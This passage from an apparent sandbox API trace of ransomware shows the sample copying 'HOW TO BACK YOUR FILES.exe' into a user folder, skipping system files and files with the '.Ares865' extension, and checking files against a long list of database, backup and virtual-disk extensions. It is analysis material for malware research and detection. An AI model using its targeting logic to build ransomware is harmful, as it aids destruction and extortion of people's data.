(HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.239] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.239] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.239] CloseHandle (hObject=0x118) returned 1 [0065.239] CloseHandle (hObject=0x164) returned 1 [0065.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.240] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aafbec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.240] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.240] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aafbec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.240] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.240] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0065.240] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer" [0065.240] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0065.240] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0065.240] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer") returned 64 [0065.240] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer" [0065.240] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.240] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.240] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.241] GetLastError () returned 0x0 [0065.241] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.241] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.241] CloseHandle (hObject=0x12c) returned 1 [0065.241] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.241] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.241] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.241] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.241] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.241] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.241] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.241] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.241] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.241] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.241] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.241] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x32b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brndlog.bak.Ares865", cAlternateFileName="BRNDLO~1.ARE")) returned 1 [0065.241] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.241] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="aoldtz.exe") returned 1 [0065.241] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2=".") returned 1 [0065.241] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="..") returned 1 [0065.242] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="windows") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="bootmgr") returned 1 [0065.242] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="temp") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="pagefile.sys") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="boot") returned 1 [0065.242] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="ids.txt") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="ntuser.dat") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="perflogs") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.bak.Ares865", lpString2="MSBuild") returned -1 [0065.242] lstrlenW (lpString="brndlog.bak.Ares865") returned 19 [0065.242] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\*") returned 66 [0065.242] lstrcpyW (in: lpString1=0x2cce482, lpString2="brndlog.bak.Ares865" | out: lpString1="brndlog.bak.Ares865") returned="brndlog.bak.Ares865" [0065.242] lstrlenW (lpString="brndlog.bak.Ares865") returned 19 [0065.242] lstrlenW (lpString="Ares865") returned 7 [0065.242] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0065.242] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb371c2, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x2fa9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brndlog.txt", cAlternateFileName="")) returned 1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="aoldtz.exe") returned 1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2=".") returned 1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="..") returned 1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="windows") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="bootmgr") returned 1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="temp") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="pagefile.sys") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="boot") returned 1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="ids.txt") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="ntuser.dat") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="perflogs") returned -1 [0065.242] lstrcmpiW (lpString1="brndlog.txt", lpString2="MSBuild") returned -1 [0065.242] lstrlenW (lpString="brndlog.txt") returned 11 [0065.242] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.bak.Ares865") returned 84 [0065.242] lstrcpyW (in: lpString1=0x2cce482, lpString2="brndlog.txt" | out: lpString1="brndlog.txt") returned="brndlog.txt" [0065.242] lstrlenW (lpString="brndlog.txt") returned 11 [0065.242] lstrlenW (lpString="Ares865") returned 7 [0065.242] lstrcmpiW (lpString1="log.txt", lpString2="Ares865") returned 1 [0065.243] lstrlenW (lpString=".dll") returned 4 [0065.243] lstrcmpiW (lpString1="brndlog.txt", lpString2=".dll") returned 1 [0065.243] lstrlenW (lpString=".lnk") returned 4 [0065.243] lstrcmpiW (lpString1="brndlog.txt", lpString2=".lnk") returned 1 [0065.243] lstrlenW (lpString=".ini") returned 4 [0065.243] lstrcmpiW (lpString1="brndlog.txt", lpString2=".ini") returned 1 [0065.243] lstrlenW (lpString=".sys") returned 4 [0065.243] lstrcmpiW (lpString1="brndlog.txt", lpString2=".sys") returned 1 [0065.243] lstrlenW (lpString="brndlog.txt") returned 11 [0065.243] lstrlenW (lpString="bak") returned 3 [0065.243] lstrcmpiW (lpString1="txt", lpString2="bak") returned 1 [0065.243] lstrlenW (lpString="ba_") returned 3 [0065.243] lstrcmpiW (lpString1="txt", lpString2="ba_") returned 1 [0065.243] lstrlenW (lpString="dbb") returned 3 [0065.243] lstrcmpiW (lpString1="txt", lpString2="dbb") returned 1 [0065.243] lstrlenW (lpString="vmdk") returned 4 [0065.243] lstrcmpiW (lpString1=".txt", lpString2="vmdk") returned -1 [0065.243] lstrlenW (lpString="rar") returned 3 [0065.243] lstrcmpiW (lpString1="txt", lpString2="rar") returned 1 [0065.243] lstrlenW (lpString="zip") returned 3 [0065.243] lstrcmpiW (lpString1="txt", lpString2="zip") returned -1 [0065.243] lstrlenW (lpString="tgz") returned 3 [0065.243] lstrcmpiW (lpString1="txt", lpString2="tgz") returned 1 [0065.243] lstrlenW (lpString="vbox") returned 4 [0065.243] lstrcmpiW (lpString1=".txt", lpString2="vbox") returned -1 [0065.243] lstrlenW (lpString="vdi") returned 3 [0065.243] lstrcmpiW (lpString1="txt", lpString2="vdi") returned -1 [0065.243] lstrlenW (lpString="vhd") returned 3 [0065.243] lstrcmpiW (lpString1="txt", lpString2="vhd") returned -1 [0065.243] lstrlenW (lpString="vhdx") returned 4 [0065.243] lstrcmpiW (lpString1=".txt", lpString2="vhdx") returned -1 [0065.243] lstrlenW (lpString="avhd") returned 4 [0065.243] lstrcmpiW (lpString1=".txt", lpString2="avhd") returned -1 [0065.243] lstrlenW (lpString="db") returned 2 [0065.243] lstrcmpiW (lpString1="xt", lpString2="db") returned 1 [0065.243] lstrlenW (lpString="db2") returned 3 [0065.243] lstrcmpiW (lpString1="txt", lpString2="db2") returned 1 [0065.243] lstrlenW (lpString="db3") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="db3") returned 1 [0065.244] lstrlenW (lpString="dbf") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="dbf") returned 1 [0065.244] lstrlenW (lpString="mdf") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="mdf") returned 1 [0065.244] lstrlenW (lpString="mdb") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="mdb") returned 1 [0065.244] lstrlenW (lpString="sql") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="sql") returned 1 [0065.244] lstrlenW (lpString="sqlite") returned 6 [0065.244] lstrcmpiW (lpString1="og.txt", lpString2="sqlite") returned -1 [0065.244] lstrlenW (lpString="sqlite3") returned 7 [0065.244] lstrcmpiW (lpString1="log.txt", lpString2="sqlite3") returned -1 [0065.244] lstrlenW (lpString="sqlitedb") returned 8 [0065.244] lstrcmpiW (lpString1="dlog.txt", lpString2="sqlitedb") returned -1 [0065.244] lstrlenW (lpString="xml") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="xml") returned -1 [0065.244] lstrlenW (lpString="$er") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="$er") returned 1 [0065.244] lstrlenW (lpString="4dd") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="4dd") returned 1 [0065.244] lstrlenW (lpString="4dl") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="4dl") returned 1 [0065.244] lstrlenW (lpString="^^^") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="^^^") returned 1 [0065.244] lstrlenW (lpString="abs") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="abs") returned 1 [0065.244] lstrlenW (lpString="abx") returned 3 [0065.244] lstrcmpiW (lpString1="txt", lpString2="abx") returned 1 [0065.244] lstrlenW (lpString="accdb") returned 5 [0065.244] lstrcmpiW (lpString1="g.txt", lpString2="accdb") returned 1 [0065.244] lstrlenW (lpString="accdc") returned 5 [0065.244] lstrcmpiW (lpString1="g.txt", lpString2="accdc") returned 1 [0065.244] lstrlenW (lpString="accde") returned 5 [0065.244] lstrcmpiW (lpString1="g.txt", lpString2="accde") returned 1 [0065.244] lstrlenW (lpString="accdr") returned 5 [0065.244] lstrcmpiW (lpString1="g.txt", lpString2="accdr") returned 1 [0065.245] lstrlenW (lpString="accdt") returned 5 [0065.245] lstrcmpiW (lpString1="g.txt", lpString2="accdt") returned 1 [0065.245] lstrlenW (lpString="accdw") returned 5 [0065.245] lstrcmpiW (lpString1="g.txt", lpString2="accdw") returned 1 [0065.245] lstrlenW (lpString="accft") returned 5 [0065.245] lstrcmpiW (lpString1="g.txt", lpString2="accft") returned 1 [0065.245] lstrlenW (lpString="adb") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="adb") returned 1 [0065.245] lstrlenW (lpString="adb") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="adb") returned 1 [0065.245] lstrlenW (lpString="ade") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="ade") returned 1 [0065.245] lstrlenW (lpString="adf") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="adf") returned 1 [0065.245] lstrlenW (lpString="adn") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="adn") returned 1 [0065.245] lstrlenW (lpString="adp") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="adp") returned 1 [0065.245] lstrlenW (lpString="alf") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="alf") returned 1 [0065.245] lstrlenW (lpString="ask") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="ask") returned 1 [0065.245] lstrlenW (lpString="btr") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="btr") returned 1 [0065.245] lstrlenW (lpString="cat") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="cat") returned 1 [0065.245] lstrlenW (lpString="cdb") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="cdb") returned 1 [0065.245] lstrlenW (lpString="ckp") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="ckp") returned 1 [0065.245] lstrlenW (lpString="cma") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="cma") returned 1 [0065.245] lstrlenW (lpString="cpd") returned 3 [0065.245] lstrcmpiW (lpString1="txt", lpString2="cpd") returned 1 [0065.245] lstrlenW (lpString="dacpac") returned 6 [0065.245] lstrcmpiW (lpString1="og.txt", lpString2="dacpac") returned 1 [0065.245] lstrlenW (lpString="dad") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dad") returned 1 [0065.246] lstrlenW (lpString="dadiagrams") returned 10 [0065.246] lstrcmpiW (lpString1="rndlog.txt", lpString2="dadiagrams") returned 1 [0065.246] lstrlenW (lpString="daschema") returned 8 [0065.246] lstrcmpiW (lpString1="dlog.txt", lpString2="daschema") returned 1 [0065.246] lstrlenW (lpString="db-journal") returned 10 [0065.246] lstrcmpiW (lpString1="rndlog.txt", lpString2="db-journal") returned 1 [0065.246] lstrlenW (lpString="db-shm") returned 6 [0065.246] lstrcmpiW (lpString1="og.txt", lpString2="db-shm") returned 1 [0065.246] lstrlenW (lpString="db-wal") returned 6 [0065.246] lstrcmpiW (lpString1="og.txt", lpString2="db-wal") returned 1 [0065.246] lstrlenW (lpString="dbc") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dbc") returned 1 [0065.246] lstrlenW (lpString="dbs") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dbs") returned 1 [0065.246] lstrlenW (lpString="dbt") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dbt") returned 1 [0065.246] lstrlenW (lpString="dbv") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dbv") returned 1 [0065.246] lstrlenW (lpString="dbx") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dbx") returned 1 [0065.246] lstrlenW (lpString="dcb") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dcb") returned 1 [0065.246] lstrlenW (lpString="dct") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dct") returned 1 [0065.246] lstrlenW (lpString="dcx") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dcx") returned 1 [0065.246] lstrlenW (lpString="ddl") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="ddl") returned 1 [0065.246] lstrlenW (lpString="dlis") returned 4 [0065.246] lstrcmpiW (lpString1=".txt", lpString2="dlis") returned -1 [0065.246] lstrlenW (lpString="dp1") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dp1") returned 1 [0065.246] lstrlenW (lpString="dqy") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dqy") returned 1 [0065.246] lstrlenW (lpString="dsk") returned 3 [0065.246] lstrcmpiW (lpString1="txt", lpString2="dsk") returned 1 [0065.247] lstrlenW (lpString="dsn") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="dsn") returned 1 [0065.247] lstrlenW (lpString="dtsx") returned 4 [0065.247] lstrcmpiW (lpString1=".txt", lpString2="dtsx") returned -1 [0065.247] lstrlenW (lpString="dxl") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="dxl") returned 1 [0065.247] lstrlenW (lpString="eco") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="eco") returned 1 [0065.247] lstrlenW (lpString="ecx") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="ecx") returned 1 [0065.247] lstrlenW (lpString="edb") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="edb") returned 1 [0065.247] lstrlenW (lpString="epim") returned 4 [0065.247] lstrcmpiW (lpString1=".txt", lpString2="epim") returned -1 [0065.247] lstrlenW (lpString="fcd") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="fcd") returned 1 [0065.247] lstrlenW (lpString="fdb") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="fdb") returned 1 [0065.247] lstrlenW (lpString="fic") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="fic") returned 1 [0065.247] lstrlenW (lpString="flexolibrary") returned 12 [0065.247] lstrlenW (lpString="fm5") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="fm5") returned 1 [0065.247] lstrlenW (lpString="fmp") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="fmp") returned 1 [0065.247] lstrlenW (lpString="fmp12") returned 5 [0065.247] lstrcmpiW (lpString1="g.txt", lpString2="fmp12") returned 1 [0065.247] lstrlenW (lpString="fmpsl") returned 5 [0065.247] lstrcmpiW (lpString1="g.txt", lpString2="fmpsl") returned 1 [0065.247] lstrlenW (lpString="fol") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="fol") returned 1 [0065.247] lstrlenW (lpString="fp3") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="fp3") returned 1 [0065.247] lstrlenW (lpString="fp4") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="fp4") returned 1 [0065.247] lstrlenW (lpString="fp5") returned 3 [0065.247] lstrcmpiW (lpString1="txt", lpString2="fp5") returned 1 [0065.247] lstrlenW (lpString="fp7") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="fp7") returned 1 [0065.248] lstrlenW (lpString="fpt") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="fpt") returned 1 [0065.248] lstrlenW (lpString="frm") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="frm") returned 1 [0065.248] lstrlenW (lpString="gdb") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="gdb") returned 1 [0065.248] lstrlenW (lpString="gdb") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="gdb") returned 1 [0065.248] lstrlenW (lpString="grdb") returned 4 [0065.248] lstrcmpiW (lpString1=".txt", lpString2="grdb") returned -1 [0065.248] lstrlenW (lpString="gwi") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="gwi") returned 1 [0065.248] lstrlenW (lpString="hdb") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="hdb") returned 1 [0065.248] lstrlenW (lpString="his") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="his") returned 1 [0065.248] lstrlenW (lpString="ib") returned 2 [0065.248] lstrcmpiW (lpString1="xt", lpString2="ib") returned 1 [0065.248] lstrlenW (lpString="idb") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="idb") returned 1 [0065.248] lstrlenW (lpString="ihx") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="ihx") returned 1 [0065.248] lstrlenW (lpString="itdb") returned 4 [0065.248] lstrcmpiW (lpString1=".txt", lpString2="itdb") returned -1 [0065.248] lstrlenW (lpString="itw") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="itw") returned 1 [0065.248] lstrlenW (lpString="jet") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="jet") returned 1 [0065.248] lstrlenW (lpString="jtx") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="jtx") returned 1 [0065.248] lstrlenW (lpString="kdb") returned 3 [0065.248] lstrcmpiW (lpString1="txt", lpString2="kdb") returned 1 [0065.248] lstrlenW (lpString="kexi") returned 4 [0065.248] lstrcmpiW (lpString1=".txt", lpString2="kexi") returned -1 [0065.248] lstrlenW (lpString="kexic") returned 5 [0065.248] lstrcmpiW (lpString1="g.txt", lpString2="kexic") returned -1 [0065.249] lstrlenW (lpString="kexis") returned 5 [0065.249] lstrcmpiW (lpString1="g.txt", lpString2="kexis") returned -1 [0065.249] lstrlenW (lpString="lgc") returned 3 [0065.249] lstrcmpiW (lpString1="txt", lpString2="lgc") returned 1 [0065.249] lstrlenW (lpString="lwx") returned 3 [0065.249] lstrcmpiW (lpString1="txt", lpString2="lwx") returned 1 [0065.249] lstrlenW (lpString="maf") returned 3 [0065.249] lstrcmpiW (lpString1="txt", lpString2="maf") returned 1 [0065.249] lstrlenW (lpString="maq") returned 3 [0065.249] lstrcmpiW (lpString1="txt", lpString2="maq") returned 1 [0065.249] lstrlenW (lpString="mar") returned 3 [0065.249] lstrcmpiW (lpString1="txt", lpString2="mar") returned 1 [0065.249] lstrlenW (lpString="marshal") returned 7 [0065.249] lstrcmpiW (lpString1="log.txt", lpString2="marshal") returned -1 [0065.249] lstrlenW (lpString="mas") returned 3 [0065.249] lstrcmpiW (lpString1="txt", lpString2="mas") returned 1 [0065.249] lstrlenW (lpString="mav") returned 3 [0065.249] lstrcmpiW (lpString1="txt", lpString2="mav") returned 1 [0065.249] lstrlenW (lpString="maw") returned 3 [0065.249] lstrcmpiW (lpString1="txt", lpString2="maw") returned 1 [0065.249] lstrlenW (lpString="mdbhtml") returned 7 [0065.249] lstrcmpiW (lpString1="log.txt", lpString2="mdbhtml") returned -1 [0065.249] lstrlenW (lpString="mdn") returned 3 [0065.249] lstrcmpiW (lpString1="txt", lpString2="mdn") returned 1 [0065.249] lstrlenW (lpString="mdt") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="mdt") returned 1 [0065.250] lstrlenW (lpString="mfd") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="mfd") returned 1 [0065.250] lstrlenW (lpString="mpd") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="mpd") returned 1 [0065.250] lstrlenW (lpString="mrg") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="mrg") returned 1 [0065.250] lstrlenW (lpString="mud") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="mud") returned 1 [0065.250] lstrlenW (lpString="mwb") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="mwb") returned 1 [0065.250] lstrlenW (lpString="myd") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="myd") returned 1 [0065.250] lstrlenW (lpString="ndf") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="ndf") returned 1 [0065.250] lstrlenW (lpString="nnt") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="nnt") returned 1 [0065.250] lstrlenW (lpString="nrmlib") returned 6 [0065.250] lstrcmpiW (lpString1="og.txt", lpString2="nrmlib") returned 1 [0065.250] lstrlenW (lpString="ns2") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="ns2") returned 1 [0065.250] lstrlenW (lpString="ns3") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="ns3") returned 1 [0065.250] lstrlenW (lpString="ns4") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="ns4") returned 1 [0065.250] lstrlenW (lpString="nsf") returned 3 [0065.250] lstrcmpiW (lpString1="txt", lpString2="nsf") returned 1 [0065.250] lstrlenW (lpString="nv") returned 2 [0065.250] lstrcmpiW (lpString1="xt", lpString2="nv") returned 1 [0065.250] 